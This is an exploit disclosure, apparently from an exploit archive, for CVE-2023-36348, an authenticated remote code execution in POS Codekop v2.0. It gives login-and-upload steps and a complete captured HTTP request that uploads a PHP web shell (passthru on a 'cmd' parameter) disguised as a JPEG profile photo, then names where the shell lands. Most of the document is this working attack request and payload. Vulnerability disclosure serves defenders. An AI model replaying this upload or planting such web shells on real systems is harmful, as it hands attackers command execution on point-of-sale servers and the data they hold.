Share
## https://sploitus.com/exploit?id=PACKETSTORM:173278
# Exploit Title: POS Codekop v2.0 - Authenticated Remote Code Execution (RCE)  
# Date: 25-05-2023  
# Exploit Author: yuyudhn  
# Vendor Homepage: https://www.codekop.com/  
# Software Link: https://github.com/fauzan1892/pos-kasir-php  
# Version: 2.0  
# Tested on: Linux  
# CVE: CVE-2023-36348  
# Vulnerability description: The application does not sanitize the filename  
parameter when sending data to /fungsi/edit/edit.php?gambar=user. An  
attacker can exploit this issue by uploading a PHP file and accessing it,  
leading to Remote Code Execution.  
# Reference: https://yuyudhn.github.io/pos-codekop-vulnerability/  
  
# Proof of Concept:  
1. Login to POS Codekop dashboard.  
2. Go to profile settings.  
3. Upload PHP script through Upload Profile Photo.  
  
Burp Log Example:  
```  
POST /research/pos-kasir-php/fungsi/edit/edit.php?gambar=user HTTP/1.1  
Host: localhost  
Content-Length: 8934  
Cache-Control: max-age=0  
sec-ch-ua:  
sec-ch-ua-mobile: ?0  
sec-ch-ua-platform: ""  
**Upgrade-Insecure-Requests: 1  
Origin: http://localhost  
Content-Type: multipart/form-data;  
boundary=----WebKitFormBoundarymVBHqH4m6KgKBnpa  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36  
(KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36  
Accept:  
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7  
Sec-Fetch-User: ?1**  
Sec-Fetch-Dest: document  
Referer: http://localhost/research/pos-kasir-php/index.php?page=user  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: PHPSESSID=vqlfiarme77n1r4o8eh2kglfhv  
Connection: close  
  
------WebKitFormBoundarymVBHqH4m6KgKBnpa  
Content-Disposition: form-data; name="foto"; filename="asuka-rce.php"  
Content-Type: image/jpeg  
  
ÿØÿà JFIF HHÿþ6<?php passthru($_GET['cmd']); __halt_compiler(); ?>  
ÿÛC  
  
-----------------------------  
```  
PHP Web Shell location:  
http://localhost/research/pos-kasir-php/assets/img/user/[random_number]asuka-rce.php